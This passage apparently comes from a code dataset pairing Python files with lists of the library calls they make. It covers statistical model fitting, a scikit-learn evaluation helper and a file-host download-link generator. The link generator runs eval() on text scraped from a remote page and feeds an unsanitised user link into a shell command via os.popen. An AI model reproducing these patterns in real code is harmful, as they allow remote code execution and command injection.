'NUMPY', NpyFormat(), ['npy'])
atexit.register(remove_python_formats)
|
[
"atexit.register",
"numpy.load",
"numpy.save",
"numpy.asarray"
] |
[((2154, 2192), 'atexit.register', 'atexit.register', (['remove_python_formats'], {}), '(remove_python_formats)\n', (2169, 2192), False, 'import atexit\n'), ((309, 326), 'numpy.load', 'np.load', (['filename'], {}), '(filename)\n', (316, 326), True, 'import numpy as np\n'), ((1280, 1302), 'numpy.save', 'np.save', (['filename', 'mat'], {}), '(filename, mat)\n', (1287, 1302), True, 'import numpy as np\n'), ((821, 836), 'numpy.asarray', 'np.asarray', (['vol'], {}), '(vol)\n', (831, 836), True, 'import numpy as np\n')]
|
import sys, time, itertools, resource, logging
from multiprocessing import Pool, Process
from util import psutil_process, print_datetime, array2string, PyTorchDType as dtype
import torch
import numpy as np
import gurobipy as grb
from scipy.special import loggamma
from sampleForIntegral import integrateOfExponentialOverSimplexInduction2
def estimateParametersY(self, max_iter=10):
logging.info(f'{print_datetime()}Estimating M and sigma_yx_inv')
As = []
Bs = []
sizes = np.fromiter(map(np.size, self.YTs), dtype=float)
for YT, E, XT in zip(self.YTs, self.Es, self.XTs):
if self.dropout_mode == 'raw':
As.append(YT.T @ XT)
Bs.append(XT.T @ XT)
else:
raise NotImplementedError
m = grb.Model('M')
m.setParam('OutputFlag', False)
m.Params.Threads = 1
if self.M_constraint == 'sum2one':
vM = m.addVars(self.GG, self.K, lb=0.)
m.addConstrs((vM.sum('*', i) == 1 for i in range(self.K)))
else:
raise NotImplementedError
for iiter in range(max_iter):
obj = 0
for beta, YT, sigma_yx_inv, A, B, G, XT in zip(self.betas, self.YTs, self.sigma_yx_invs, As, Bs, self.Gs, self.XTs):
# constant terms
if self.dropout_mode == 'raw':
t = YT.ravel()
else:
raise NotImplementedError
obj += beta * sigma_yx_inv**2 * np.dot(t, t)
# linear terms
t = -2 * beta * sigma_yx_inv**2 * A
obj += grb.quicksum([t[i, j] * vM[i, j] for i in range(G) for j in range(self.K)])
# quadratic terms
if self.dropout_mode == 'raw':
t = beta * sigma_yx_inv**2 * B
t[np.diag_indices(self.K)] += 1e-5
obj += grb.quicksum([t[i, i] * vM[k, i] * vM[k, i] for k in range(G) for i in range(self.K)])
t *= 2
obj += grb.quicksum([t[i, j] * vM[k, i] * vM[k, j] for k in range(G) for i in range(self.K) for j in range(i+1, self.K)])
else:
raise NotImplementedError
del t, beta, YT, A, B, G
kk = 0
if kk != 0:
obj += grb.quicksum([kk/2 * vM[k, i] * vM[k, i] for k in range(self.GG) for i in range(self.K)])
m.setObjective(obj, grb.GRB.MINIMIZE)
m.optimize()
self.M = np.array([[vM[i, j].x for j in range(self.K)] for i in range(self.GG)])
if self.M_constraint in ['sum2one', 'none']:
pass
elif self.M_constraint == 'L1':
self.M /= np.abs(self.M).sum(0, keepdims=True)
elif self.M_constraint == 'L2':
self.M /= np.sqrt((self.M ** 2).sum(0, keepdims=True))
else:
raise NotImplementedError
last_sigma_yx_invs = np.copy(self.sigma_yx_invs)
ds = np.array([
np.dot(YT.ravel(), YT.ravel()) - 2*np.dot(A.ravel(), self.M[:G].ravel()) + np.dot(B.ravel(), (self.M[:G].T @ self.M[:G]).ravel())
for YT, A, B, G in zip(self.YTs, As, Bs, self.Gs)
])
if self.sigma_yx_inv_mode == 'separate':
t = ds / sizes
self.sigma_yx_invs = 1. / np.sqrt(t)
elif self.sigma_yx_inv_mode == 'average':
t = np.dot(self.betas, ds) / np.dot(self.betas, sizes)
self.sigma_yx_invs = np.full(self.num_repli, 1 / (np.sqrt(t) + 1e-20))
elif self.sigma_yx_inv_mode.startswith('average '):
idx = np.array(list(map(int, self.sigma_yx_inv_mode.split(' ')[1:])))
t = np.dot(self.betas[idx], ds[idx]) / np.dot(self.betas[idx], sizes[idx])
self.sigma_yx_invs = np.full(self.num_repli, 1 / (np.sqrt(t) + 1e-20))
else:
raise NotImplementedError
d = self.sigma_yx_invs - last_sigma_yx_invs
logging.info(f"{print_datetime()}At iter {iiter}, σ_yxInv: {array2string(d)} -> {array2string(self.sigma_yx_invs)}")
if (np.abs(d) / self.sigma_yx_invs).max() < 1e-5 or self.num_repli <= 1 or self.sigma_yx_inv_mode.startswith('average'):
break
# emission
Q_Y = -np.dot(self.betas, sizes) / 2
# partition function - Pr [ Y | X, Theta ]
Q_Y -= np.dot(self.betas, sizes) * np.log(2*np.pi) / 2
Q_Y += (sizes * self.betas * np.log(self.sigma_yx_invs)).sum()
return Q_Y
def estimateParametersX(self, iiter):
logging.info(f'{print_datetime()}Estimating Sigma_x_inv and prior_xs')
device = self.PyTorch_device
Bs = []
talphas = []
talpha_es = []
tC = torch.zeros([self.K, self.K], dtype=dtype, device=device)
tnus = []
for YT, E, XT, beta in zip(self.YTs, self.Es, self.XTs, self.betas):
tXT = torch.tensor(XT, dtype=dtype, device=device)
N, G = YT.shape
if self.dropout_mode == 'raw':
Bs.append(XT.T @ XT)
else:
raise NotImplementedError
talphas.append(tXT.sum(0))
talpha_es.append(torch.tensor(list(map(len, E)), dtype=dtype, device=device) @ tXT)
tXT.div_(tXT.sum(1, keepdim=True).add_(1e-30))
tnu = torch.empty([N, self.K], dtype=dtype, device=device)
for tnui, ei in zip(tnu, E):
tnui.copy_(tXT[ei].sum(0))
tnus.append(tnu)
tC.add_(alpha=beta, other=tXT.t() @ tnu)
del tXT
Q_X = 0
if all(prior_x[0] == 'Gaussian' for prior_x in self.prior_xs) and self.pairwise_potential_mode == 'linear':
raise NotImplementedError
elif self.pairwise_potential_mode in ['linear', 'linear w/ shift']:
raise NotImplementedError
elif all(prior_x[0] in ['Exponential shared', 'Exponential shared fixed'] for prior_x in self.prior_xs) and self.pairwise_potential_mode == 'normalized':
prior_xs_old = self.prior_xs
self.prior_xs = []
for N, prior_x, talpha in zip(self.Ns, prior_xs_old, talphas):
if prior_x[0] == 'Exponential shared':
lambda_x, = prior_x[1:]
lambda_x = talpha.mean().div_(N).pow(-1).cpu().data.numpy()
Q_X -= lambda_x * talpha.sum().cpu().data.numpy()
Q_X += N*self.K*np.log(lambda_x) - N*loggamma(self.K)
prior_x = prior_x[:1] + (np.full(self.K, lambda_x), )
self.prior_xs.append(prior_x)
elif prior_x[0] == 'Exponential shared fixed':
lambda_x, = prior_x[1:]
Q_X -= lambda_x.mean() * talpha.sum().cpu().data.numpy()
self.prior_xs.append(prior_x)
else:
raise NotImplementedError
del prior_xs_old
if not all(self.Es_empty):
# valid_diter = 1
# valid_diter = 7
# valid_diter = 31
# valid_diter = 97
valid_diter = 331
# valid_diter = 997
# valid_diter = 3343
# valid_diter = 7177
# valid_diter = 9973
max_iter = 1e4
max_iter = int(max_iter)
batch_sizes = [512, ] * self.num_repli
# requires_grad = True
requires_grad = False
var_list = []
optimizers = []
schedulars = []
tSigma_x_inv = torch.tensor(self.Sigma_x_inv, dtype=dtype, device=device, requires_grad=requires_grad)
var_list += [
tSigma_x_inv,
]
schedular = None
optimizer = torch.optim.Adam([tSigma_x_inv], lr=1e-2)
schedular = torch.optim.lr_scheduler.StepLR(optimizer, valid_diter, gamma=0.98)
optimizers.append(optimizer)
if schedular: schedulars.append(schedular)
del optimizer, schedular
tprior_xs = []
for prior_x in self.prior_xs:
if prior_x[0] in ['Exponential shared', 'Exponential shared fixed']:
lambda_x, = prior_x[1:]
tlambda_x = torch.tensor(lambda_x, dtype=dtype, device=device, requires_grad=requires_grad)
tprior_xs.append((prior_x[0], tlambda_x,))
var_list.append(tlambda_x)
del lambda_x
else:
raise NotImplementedError
for t in var_list: t.grad = torch.zeros_like(t)
tdiagBs = [torch.tensor(np.diag(B).copy(), dtype=dtype, device=device) for B in Bs]
tNus = [tnu.sum(0) for tnu in tnus]
tNu2s = [tnu.t() @ tnu for tnu in tnus]
talpha_e_all = torch.zeros_like(talpha_es[0])
for beta, talpha_e in zip(self.betas, talpha_es): talpha_e_all.add_(alpha=beta, other=talpha_e)
NEs = [sum(map(len, E)) for E in self.Es]
tnEs = [torch.tensor(list(map(len, E)), dtype=dtype, device=device) for E in self.Es]
tZTs = [torch.tensor(XT, dtype=dtype, device=device) for XT in self.XTs]
for tZT in tZTs: tZT.div_(tZT.sum(1, keepdim=True))
# Sigma_x_inv_ub = 1.
# Sigma_x_inv_lb = -1.
Sigma_x_inv_lb = None
Sigma_x_inv_ub = None
Sigma_x_inv_constraint = None # complete matrix
# Sigma_x_inv_constraint = 'diagonal' # diagonal matrix
# Sigma_x_inv_constraint = 'diagonal same' # diagonal matrix, diagonal values are all the same
row_idx, col_idx = np.triu_indices(self.K, 0)
assumption_str = 'mean-field'
# assumption_str = None
# assumption_str = 'independent'
random_flag = assumption_str in [
'independent',
'mean-field',
]
n_samples = 0
regenerate_diter = int(1e10)
tZes = [None] * self.num_repli
nsample4integral = 64
if assumption_str == None:
raise NotImplementedError
elif assumption_str == 'mean-field':
pass
elif assumption_str == 'independent':
raise NotImplementedError
else:
raise NotImplementedError
if assumption_str in [None, 'independent']:
tC.div_(2)
loggamma_K = loggamma(self.K)
__t__, func, last_func = 0, None, torch.empty([], dtype=dtype, device=device).fill_(np.nan)
best_func, best_iter = torch.empty([], dtype=dtype, device=device).fill_(np.nan), -1
tSigma_x_inv_best = None
for __t__ in range(max_iter + 1):
if not requires_grad:
for t in var_list: t.grad.zero_()
else:
for optimizer in optimizers:
optimizer.zero_grad()
assert (tSigma_x_inv - tSigma_x_inv.t()).abs().max() < 1e-15
if Sigma_x_inv_lb is not None:
tSigma_x_inv.clamp_(min=Sigma_x_inv_lb)
if Sigma_x_inv_ub is not None:
tSigma_x_inv.clamp_(max=Sigma_x_inv_ub)
if Sigma_x_inv_constraint in ['diagonal', 'diagonal same']:
tSigma_x_inv.triu_().tril_()
if Sigma_x_inv_constraint in ['diagonal same']:
tSigma_x_inv[(range(self.K), range(self.K))] = tSigma_x_inv[(range(self.K), range(self.K))].mean()
func = torch.zeros([], dtype=dtype, device=device)
# if requires_grad:
func_grad = torch.zeros([], dtype=dtype, device=device, requires_grad=True)
# pairwise potential
tSigma_x_inv.grad.add_(tC)
if requires_grad:
func_grad = func_grad + tC.view(-1) @ tSigma_x_inv.view(-1)
else:
func.add_(tC.view(-1) @ tSigma_x_inv.view(-1))
for N, E_empty, NE, tnE, E, beta, tZT, tZe, talpha, tnu, tNu, tNu2, tdiagB, tprior_x in zip(
self.Ns,
self.Es_empty, NEs, tnEs, self.Es, self.betas, tZTs, tZes,
talphas, tnus, tNus, tNu2s, tdiagBs,
tprior_xs,
):
if E_empty:
continue
if assumption_str == 'mean-field':
if tprior_x[0] in ['Exponential shared', 'Exponential shared fixed']:
if __t__ % valid_diter == 0:
idx = slice(None)
else:
idx = np.random.choice(N, min(nsample4integral, N), replace=False)
tnu = tnu[idx].contiguous()
c = NE / tnE[idx].sum()
# Z_z
teta = tnu @ tSigma_x_inv
teta.grad = torch.zeros_like(teta)
# torch.manual_seed(iiter)
if iiter > 1 or __t__ > 100:
# tlogZ = integrateOfExponentialOverSimplexSampling(teta, requires_grad=requires_grad, seed=iiter*max_iter+__t__)
tlogZ = integrateOfExponentialOverSimplexInduction2(teta, grad=c, requires_grad=requires_grad, device=device)
else:
# tlogZ = integrateOfExponentialOverSimplexSampling(teta, requires_grad=requires_grad, seed=iiter*max_iter+__t__)
tlogZ = integrateOfExponentialOverSimplexInduction2(teta, grad=c, requires_grad=requires_grad, device=device)
if requires_grad:
func_grad = func_grad.add(beta*c, tlogZ.sum())
else:
func.add_(alpha=beta*c, other=tlogZ.sum())
tSigma_x_inv.grad.addmm_(alpha=beta, mat1=tnu.t(), mat2=teta.grad)
else:
raise NotImplementedError
elif assumption_str == None:
raise NotImplementedError
elif assumption_str == 'independent':
raise NotImplementedError
else:
raise NotImplementedError
if requires_grad:
func_grad.backward()
func = func + func_grad
# prior on Σ_x^inv
# num_burnin_iter = 200
# if iiter <= num_burnin_iter:
# kk = 1e-1 * np.dot(betas, list(map(len, Es))) * 1e-1**((num_burnin_iter-iiter+1)/num_burnin_iter)
# else:
# kk = 1e-1 * np.dot(betas, list(map(len, Es)))
kk = self.lambda_SigmaXInv * np.dot(self.betas, NEs)
tSigma_x_inv.grad.add_(kk, tSigma_x_inv)
func.add_(kk / 2, tSigma_x_inv.pow(2).sum())
# normalize gradient by the weighted sizes of data sets
tSigma_x_inv.grad.div_(np.dot(self.betas, NEs))
func.div_(np.dot(self.betas, list(map(len, self.YTs))))
tSigma_x_inv.grad.add_(tSigma_x_inv.grad.clone().t()).div_(2)
if Sigma_x_inv_lb is not None:
tSigma_x_inv.grad[(tSigma_x_inv <= Sigma_x_inv_lb) * (tSigma_x_inv.grad > 0)] = 0
if Sigma_x_inv_ub is not None:
tSigma_x_inv.grad[(tSigma_x_inv >= Sigma_x_inv_ub) * (tSigma_x_inv.grad < 0)] = 0
if Sigma_x_inv_constraint in ['diagonal', 'diagonal same']:
tSigma_x_inv.grad.triu_().tril_()
if Sigma_x_inv_constraint in ['diagonal same']:
tSigma_x_inv.grad[(range(self.K), range(self.K))] = tSigma_x_inv.grad[(range(self.K), range(self.K))].mean()
# setting flags
best_flag = False
if not random_flag or __t__ % valid_diter == 0:
best_flag = not best_func <= func
if best_flag:
best_func, best_iter = func, __t__
tSigma_x_inv_best = tSigma_x_inv.clone().detach()
stop_flag = True
# stop_flag = False
stop_tSigma_x_inv_grad_pseudo = 1e-1
stop_flag &= (tSigma_x_inv.grad.abs() / (tSigma_x_inv.abs() + stop_tSigma_x_inv_grad_pseudo)).abs().max().item() < 1e-2
for tprior_x in tprior_xs:
if tprior_x[0] in ['Exponential shared', ]:
tlambda_x, = tprior_x[1:]
stop_flag &= tlambda_x.grad.abs().max().item() < 1e-4
del tlambda_x
elif tprior_x[0] in ['Exponential shared fixed', ]:
pass
else:
raise NotImplementedError
if random_flag:
stop_flag &= not bool(func <= last_func - 1e-3*valid_diter)
else:
stop_flag &= not bool(func <= last_func - 1e-3)
stop_flag |= random_flag and not __t__ < best_iter + 2*valid_diter
# stop_flag |= best_func == func and __t__ > best_iter + 20
if random_flag and __t__ % valid_diter != 0:
stop_flag = False
if __t__ >= max_iter:
stop_flag = True
warning_flag = bool(func > last_func + 1e-10)
warning_flag &= not random_flag or __t__ % valid_diter == 0
# warning_flag = True
if __t__ % valid_diter == 0 or stop_flag or warning_flag or (regenerate_diter != 1 and (__t__ % regenerate_diter == 0 or (__t__+1) % regenerate_diter == 0)):
print(
f'At iter {__t__},\t'
f'func = {(func - last_func).item():.2e} -> {func.item():.2e}\t'
f'Σ_x^inv: {tSigma_x_inv.max().item():.1e} - {tSigma_x_inv.min().item():.1e} = {tSigma_x_inv.max() - tSigma_x_inv.min():.1e} '
f'grad = {tSigma_x_inv.grad.min().item():.2e} {tSigma_x_inv.grad.max().item():.2e}\t'
f'var/grad = {(tSigma_x_inv.grad.abs()/(tSigma_x_inv.abs() + stop_tSigma_x_inv_grad_pseudo)).abs().max().item():.2e}'
# f'δ_x: {tdelta_x.max().item():.1e} - {tdelta_x.min().item():.1e} = {tdelta_x.max() - tdelta_x.min():.1e} '
# f'grad = {tdelta_x.grad.min().item():.2e} {tdelta_x.grad.max().item():.2e}'
, end=''
)
if warning_flag: print('\tWarning', end='')
if best_flag:
print('\tbest', end='')
print()
sys.stdout.flush()
# stop_flag = True
if not stop_flag:
for optimizer in optimizers: optimizer.step()
for schedular in schedulars: schedular.step()
if stop_flag: break
if not random_flag or __t__ % valid_diter == 0:
last_func = func
tSigma_x_inv = tSigma_x_inv_best
func = best_func
self.Sigma_x_inv = tSigma_x_inv.cpu().data.numpy()
Q_X -= func.mul_(np.dot(self.betas, list(map(len, self.YTs)))).item()
elif all(prior_x[0] == 'Exponential' for prior_x in self.prior_xs) and self.pairwise_potential_mode == 'normalized':
raise NotImplementedError
else:
raise NotImplementedError
return Q_X
|
[
"util.array2string",
"sampleForIntegral.integrateOfExponentialOverSimplexInduction2",
"torch.optim.lr_scheduler.StepLR",
"numpy.abs",
"torch.empty",
"sys.stdout.flush",
"numpy.diag",
"numpy.full",
"scipy.special.loggamma",
"numpy.copy",
"torch.zeros",
"torch.zeros_like",
"util.print_datetime",
"numpy.diag_indices",
"gurobipy.Model",
"numpy.triu_indices",
"torch.optim.Adam",
"numpy.dot",
"numpy.log",
"torch.tensor",
"numpy.sqrt"
] |
[((705, 719), 'gurobipy.Model', 'grb.Model', (['"""M"""'], {}), "('M')\n", (714, 719), True, 'import gurobipy as grb\n'), ((3943, 4000), 'torch.zeros', 'torch.zeros', (['[self.K, self.K]'], {'dtype': 'dtype', 'device': 'device'}), '([self.K, self.K], dtype=dtype, device=device)\n', (3954, 4000), False, 'import torch\n'), ((2396, 2423), 'numpy.copy', 'np.copy', (['self.sigma_yx_invs'], {}), '(self.sigma_yx_invs)\n', (2403, 2423), True, 'import numpy as np\n'), ((4090, 4134), 'torch.tensor', 'torch.tensor', (['XT'], {'dtype': 'dtype', 'device': 'device'}), '(XT, dtype=dtype, device=device)\n', (4102, 4134), False, 'import torch\n'), ((4419, 4471), 'torch.empty', 'torch.empty', (['[N, self.K]'], {'dtype': 'dtype', 'device': 'device'}), '([N, self.K], dtype=dtype, device=device)\n', (4430, 4471), False, 'import torch\n'), ((3547, 3572), 'numpy.dot', 'np.dot', (['self.betas', 'sizes'], {}), '(self.betas, sizes)\n', (3553, 3572), True, 'import numpy as np\n'), ((3629, 3654), 'numpy.dot', 'np.dot', (['self.betas', 'sizes'], {}), '(self.betas, sizes)\n', (3635, 3654), True, 'import numpy as np\n'), ((3657, 3674), 'numpy.log', 'np.log', (['(2 * np.pi)'], {}), '(2 * np.pi)\n', (3663, 3674), True, 'import numpy as np\n'), ((403, 419), 'util.print_datetime', 'print_datetime', ([], {}), '()\n', (417, 419), False, 'from util import psutil_process, print_datetime, array2string, PyTorchDType as dtype\n'), ((1256, 1268), 'numpy.dot', 'np.dot', (['t', 't'], {}), '(t, t)\n', (1262, 1268), True, 'import numpy as np\n'), ((2724, 2734), 'numpy.sqrt', 'np.sqrt', (['t'], {}), '(t)\n', (2731, 2734), True, 'import numpy as np\n'), ((3707, 3733), 'numpy.log', 'np.log', (['self.sigma_yx_invs'], {}), '(self.sigma_yx_invs)\n', (3713, 3733), True, 'import numpy as np\n'), ((3811, 3827), 'util.print_datetime', 'print_datetime', ([], {}), '()\n', (3825, 3827), False, 'from util import psutil_process, print_datetime, array2string, PyTorchDType as dtype\n'), ((1508, 1531), 'numpy.diag_indices', 'np.diag_indices', (['self.K'], {}), '(self.K)\n', (1523, 1531), True, 'import numpy as np\n'), ((2786, 2808), 'numpy.dot', 'np.dot', (['self.betas', 'ds'], {}), '(self.betas, ds)\n', (2792, 2808), True, 'import numpy as np\n'), ((2811, 2836), 'numpy.dot', 'np.dot', (['self.betas', 'sizes'], {}), '(self.betas, sizes)\n', (2817, 2836), True, 'import numpy as np\n'), ((3292, 3308), 'util.print_datetime', 'print_datetime', ([], {}), '()\n', (3306, 3308), False, 'from util import psutil_process, print_datetime, array2string, PyTorchDType as dtype\n'), ((3337, 3352), 'util.array2string', 'array2string', (['d'], {}), '(d)\n', (3349, 3352), False, 'from util import psutil_process, print_datetime, array2string, PyTorchDType as dtype\n'), ((3358, 3390), 'util.array2string', 'array2string', (['self.sigma_yx_invs'], {}), '(self.sigma_yx_invs)\n', (3370, 3390), False, 'from util import psutil_process, print_datetime, array2string, PyTorchDType as dtype\n'), ((6136, 6228), 'torch.tensor', 'torch.tensor', (['self.Sigma_x_inv'], {'dtype': 'dtype', 'device': 'device', 'requires_grad': 'requires_grad'}), '(self.Sigma_x_inv, dtype=dtype, device=device, requires_grad=\n requires_grad)\n', (6148, 6228), False, 'import torch\n'), ((6299, 6340), 'torch.optim.Adam', 'torch.optim.Adam', (['[tSigma_x_inv]'], {'lr': '(0.01)'}), '([tSigma_x_inv], lr=0.01)\n', (6315, 6340), False, 'import torch\n'), ((6356, 6423), 'torch.optim.lr_scheduler.StepLR', 'torch.optim.lr_scheduler.StepLR', (['optimizer', 'valid_diter'], {'gamma': '(0.98)'}), '(optimizer, valid_diter, gamma=0.98)\n', (6387, 6423), False, 'import torch\n'), ((7158, 7188), 'torch.zeros_like', 'torch.zeros_like', (['talpha_es[0]'], {}), '(talpha_es[0])\n', (7174, 7188), False, 'import torch\n'), ((7891, 7917), 'numpy.triu_indices', 'np.triu_indices', (['self.K', '(0)'], {}), '(self.K, 0)\n', (7906, 7917), True, 'import numpy as np\n'), ((8502, 8518), 'scipy.special.loggamma', 'loggamma', (['self.K'], {}), '(self.K)\n', (8510, 8518), False, 'from scipy.special import loggamma\n'), ((2206, 2220), 'numpy.abs', 'np.abs', (['self.M'], {}), '(self.M)\n', (2212, 2220), True, 'import numpy as np\n'), ((3045, 3077), 'numpy.dot', 'np.dot', (['self.betas[idx]', 'ds[idx]'], {}), '(self.betas[idx], ds[idx])\n', (3051, 3077), True, 'import numpy as np\n'), ((3080, 3115), 'numpy.dot', 'np.dot', (['self.betas[idx]', 'sizes[idx]'], {}), '(self.betas[idx], sizes[idx])\n', (3086, 3115), True, 'import numpy as np\n'), ((6950, 6969), 'torch.zeros_like', 'torch.zeros_like', (['t'], {}), '(t)\n', (6966, 6969), False, 'import torch\n'), ((7433, 7477), 'torch.tensor', 'torch.tensor', (['XT'], {'dtype': 'dtype', 'device': 'device'}), '(XT, dtype=dtype, device=device)\n', (7445, 7477), False, 'import torch\n'), ((9397, 9440), 'torch.zeros', 'torch.zeros', (['[]'], {'dtype': 'dtype', 'device': 'device'}), '([], dtype=dtype, device=device)\n', (9408, 9440), False, 'import torch\n'), ((9481, 9544), 'torch.zeros', 'torch.zeros', (['[]'], {'dtype': 'dtype', 'device': 'device', 'requires_grad': '(True)'}), '([], dtype=dtype, device=device, requires_grad=True)\n', (9492, 9544), False, 'import torch\n'), ((2890, 2900), 'numpy.sqrt', 'np.sqrt', (['t'], {}), '(t)\n', (2897, 2900), True, 'import numpy as np\n'), ((3400, 3409), 'numpy.abs', 'np.abs', (['d'], {}), '(d)\n', (3406, 3409), True, 'import numpy as np\n'), ((6700, 6779), 'torch.tensor', 'torch.tensor', (['lambda_x'], {'dtype': 'dtype', 'device': 'device', 'requires_grad': 'requires_grad'}), '(lambda_x, dtype=dtype, device=device, requires_grad=requires_grad)\n', (6712, 6779), False, 'import torch\n'), ((11828, 11851), 'numpy.dot', 'np.dot', (['self.betas', 'NEs'], {}), '(self.betas, NEs)\n', (11834, 11851), True, 'import numpy as np\n'), ((12034, 12057), 'numpy.dot', 'np.dot', (['self.betas', 'NEs'], {}), '(self.betas, NEs)\n', (12040, 12057), True, 'import numpy as np\n'), ((14969, 14987), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (14985, 14987), False, 'import sys, time, itertools, resource, logging\n'), ((3169, 3179), 'numpy.sqrt', 'np.sqrt', (['t'], {}), '(t)\n', (3176, 3179), True, 'import numpy as np\n'), ((5330, 5346), 'numpy.log', 'np.log', (['lambda_x'], {}), '(lambda_x)\n', (5336, 5346), True, 'import numpy as np\n'), ((5351, 5367), 'scipy.special.loggamma', 'loggamma', (['self.K'], {}), '(self.K)\n', (5359, 5367), False, 'from scipy.special import loggamma\n'), ((5397, 5422), 'numpy.full', 'np.full', (['self.K', 'lambda_x'], {}), '(self.K, lambda_x)\n', (5404, 5422), True, 'import numpy as np\n'), ((8557, 8600), 'torch.empty', 'torch.empty', (['[]'], {'dtype': 'dtype', 'device': 'device'}), '([], dtype=dtype, device=device)\n', (8568, 8600), False, 'import torch\n'), ((8641, 8684), 'torch.empty', 'torch.empty', (['[]'], {'dtype': 'dtype', 'device': 'device'}), '([], dtype=dtype, device=device)\n', (8652, 8684), False, 'import torch\n'), ((6998, 7008), 'numpy.diag', 'np.diag', (['B'], {}), '(B)\n', (7005, 7008), True, 'import numpy as np\n'), ((10426, 10448), 'torch.zeros_like', 'torch.zeros_like', (['teta'], {}), '(teta)\n', (10442, 10448), False, 'import torch\n'), ((10657, 10763), 'sampleForIntegral.integrateOfExponentialOverSimplexInduction2', 'integrateOfExponentialOverSimplexInduction2', (['teta'], {'grad': 'c', 'requires_grad': 'requires_grad', 'device': 'device'}), '(teta, grad=c, requires_grad=\n requires_grad, device=device)\n', (10700, 10763), False, 'from sampleForIntegral import integrateOfExponentialOverSimplexInduction2\n'), ((10910, 11016), 'sampleForIntegral.integrateOfExponentialOverSimplexInduction2', 'integrateOfExponentialOverSimplexInduction2', (['teta'], {'grad': 'c', 'requires_grad': 'requires_grad', 'device': 'device'}), '(teta, grad=c, requires_grad=\n requires_grad, device=device)\n', (10953, 11016), False, 'from sampleForIntegral import integrateOfExponentialOverSimplexInduction2\n')]
|
# import numpy as np
from sklearn.pipeline import Pipeline
# from sklearn.svm import SVC, SVR
from sklearn.linear_model import SGDClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.model_selection import cross_val_predict
from sklearn.metrics import accuracy_score, classification_report
# import fire
def easy_eval_clf(X, y, verbose=True):
""""""
# init model (SVC)
# clf = SVC(kernel='linear')
clf = SGDClassifier(n_jobs=-1)
if X.shape[1] < X.shape[0] * 2:
preproc = StandardScaler()
else: # empirical dimension reduction for extreme cases
preproc = PCA(n_components=X.shape[0] * 2, whiten=True)
pl = Pipeline([('preproc', preproc), ('clf', clf)])
# fire cross validation
y_ = cross_val_predict(pl, X, y, cv=10)
# simple evaluation
acc = accuracy_score(y, y_)
cr = classification_report(y, y_)
if verbose:
print(cr)
print
print('Accuracy : {:.2%}'.format(acc))
return acc
class EasyEval:
""""""
def __init__(self, n_trial=1):
""""""
self.n_trial = n_trial
def eval(self):
for n in xrange(self.n_trial):
pass # do evaluation here
if __name__ == '__main__':
pass
|
[
"sklearn.preprocessing.StandardScaler",
"sklearn.linear_model.SGDClassifier",
"sklearn.metrics.accuracy_score",
"sklearn.model_selection.cross_val_predict",
"sklearn.metrics.classification_report",
"sklearn.decomposition.PCA",
"sklearn.pipeline.Pipeline"
] |
[((482, 506), 'sklearn.linear_model.SGDClassifier', 'SGDClassifier', ([], {'n_jobs': '(-1)'}), '(n_jobs=-1)\n', (495, 506), False, 'from sklearn.linear_model import SGDClassifier\n'), ((714, 760), 'sklearn.pipeline.Pipeline', 'Pipeline', (["[('preproc', preproc), ('clf', clf)]"], {}), "([('preproc', preproc), ('clf', clf)])\n", (722, 760), False, 'from sklearn.pipeline import Pipeline\n'), ((799, 833), 'sklearn.model_selection.cross_val_predict', 'cross_val_predict', (['pl', 'X', 'y'], {'cv': '(10)'}), '(pl, X, y, cv=10)\n', (816, 833), False, 'from sklearn.model_selection import cross_val_predict\n'), ((869, 890), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['y', 'y_'], {}), '(y, y_)\n', (883, 890), False, 'from sklearn.metrics import accuracy_score, classification_report\n'), ((900, 928), 'sklearn.metrics.classification_report', 'classification_report', (['y', 'y_'], {}), '(y, y_)\n', (921, 928), False, 'from sklearn.metrics import accuracy_score, classification_report\n'), ((562, 578), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (576, 578), False, 'from sklearn.preprocessing import StandardScaler\n'), ((658, 703), 'sklearn.decomposition.PCA', 'PCA', ([], {'n_components': '(X.shape[0] * 2)', 'whiten': '(True)'}), '(n_components=X.shape[0] * 2, whiten=True)\n', (661, 703), False, 'from sklearn.decomposition import PCA\n')]
|
import json
import re
import urllib.parse
from os import popen
from random import choice
import requests
from bs4 import BeautifulSoup
from bot.helper.ext_utils.exceptions import DirectDownloadLinkException
def direct_link_generator(link: str):
""" direct links generator """
if not link:
raise DirectDownloadLinkException("`No links found!`")
elif 'zippyshare.com' in link:
return zippy_share(link)
elif 'yadi.sk' in link:
return yandex_disk(link)
elif 'cloud.mail.ru' in link:
return cm_ru(link)
elif 'mediafire.com' in link:
return mediafire(link)
elif 'osdn.net' in link:
return osdn(link)
elif 'github.com' in link:
return github(link)
else:
raise DirectDownloadLinkException(f'No Direct link function found for {link}')
def zippy_share(url: str) -> str:
""" ZippyShare direct links generator
Based on https://github.com/LameLemon/ziggy"""
dl_url = ''
try:
link = re.findall(r'\bhttps?://.*zippyshare\.com\S+', url)[0]
except IndexError:
raise DirectDownloadLinkException("`No ZippyShare links found`\n")
session = requests.Session()
base_url = re.search('http.+.com', link).group()
response = session.get(link)
page_soup = BeautifulSoup(response.content, "lxml")
scripts = page_soup.find_all("script", {"type": "text/javascript"})
for script in scripts:
if "getElementById('dlbutton')" in script.text:
url_raw = re.search(r'= (?P<url>\".+\" \+ (?P<math>\(.+\)) .+);',
script.text).group('url')
math = re.search(r'= (?P<url>\".+\" \+ (?P<math>\(.+\)) .+);',
script.text).group('math')
dl_url = url_raw.replace(math, '"' + str(eval(math)) + '"')
break
dl_url = base_url + eval(dl_url)
name = urllib.parse.unquote(dl_url.split('/')[-1])
return dl_url
def yandex_disk(url: str) -> str:
""" Yandex.Disk direct links generator
Based on https://github.com/wldhx/yadisk-direct"""
try:
link = re.findall(r'\bhttps?://.*yadi\.sk\S+', url)[0]
except IndexError:
reply = "`No Yandex.Disk links found`\n"
return reply
api = 'https://cloud-api.yandex.net/v1/disk/public/resources/download?public_key={}'
try:
dl_url = requests.get(api.format(link)).json()['href']
return dl_url
except KeyError:
raise DirectDownloadLinkException("`Error: File not found / Download limit reached`\n")
def cm_ru(url: str) -> str:
""" cloud.mail.ru direct links generator
Using https://github.com/JrMasterModelBuilder/cmrudl.py"""
reply = ''
try:
link = re.findall(r'\bhttps?://.*cloud\.mail\.ru\S+', url)[0]
except IndexError:
raise DirectDownloadLinkException("`No cloud.mail.ru links found`\n")
command = f'vendor/cmrudl.py/cmrudl -s {link}'
result = popen(command).read()
result = result.splitlines()[-1]
try:
